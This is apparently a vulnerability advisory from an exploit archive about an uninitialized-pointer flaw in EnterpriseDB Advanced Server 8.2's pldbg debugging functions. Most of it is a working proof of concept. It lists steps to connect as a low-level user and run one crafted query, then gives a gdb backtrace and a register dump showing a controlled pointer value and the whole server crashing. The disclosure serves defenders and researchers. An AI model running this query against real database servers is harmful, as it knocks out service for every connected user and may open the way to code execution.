source: https://www.securityfocus.com/bid/25481/info EnterpriseDB Advanced Server is prone to an uninitialized-pointer vulnerability. Authenticated attackers can exploit this issue to cause denial-of-service conditions. Given the nature of this vulnerability, remote code execution may also be possible, but this has not been confirmed. EnterpriseDB Advanced Server 8.2 is vulnerable; other versions may also be affected. 1) Connect to one vulnerable EnterpriseDB as a low level user (the execution privilege over the pldbg_* function is granted by default). 2) Execute the following query: edb=> select pldbg_abort_target(1094861636); -- 0x41424344 in decimal (gdb) where #0 0x00ba81db in sendBytes () from /opt/EnterpriseDB/8.2/dbserver/lib/pldbgapi.so #1 0x00ba82a1 in sendUInt32 () from /opt/EnterpriseDB/8.2/dbserver/lib/pldbgapi.so #2 0x00ba82e3 in sendString () from /opt/EnterpriseDB/8.2/dbserver/lib/pldbgapi.so #3 0x00ba8880 in pldbg_abort_target () from /opt/EnterpriseDB/8.2/dbserver/lib/pldbgapi.so #4 0x0816669d in ExecMakeFunctionResult () #5 0x08168d51 in ExecProject () #6 0x0817544d in ExecResult () #7 0x08162f65 in ExecProcNode () #8 0x08161931 in ExecutorRun () #9 0x081fa2e3 in PortalRunSelect () #10 0x081fb12a in PortalRun () #11 0x081f5a8b in exec_simple_query () #12 0x081f76ec in PostgresMain () #13 0x081ca356 in ServerLoop () #14 0x081cb2b7 in PostmasterMain () #15 0x081865d7 in main () (gdb) x /i $pc 0xba81db : mov (%eax),%eax (gdb) i r eax 0x41424344 1094861636 ecx 0x4 4 edx 0xbff46c04 -1074500604 ebx 0xbacbd8 12241880 esp 0xbff46bc0 0xbff46bc0 ebp 0xbff46be8 0xbff46be8 esi 0x4 4 edi 0xbab597 12236183 eip 0xba81db 0xba81db eflags 0x10286 66182 cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 The complete database server (droping all active conections) crashes.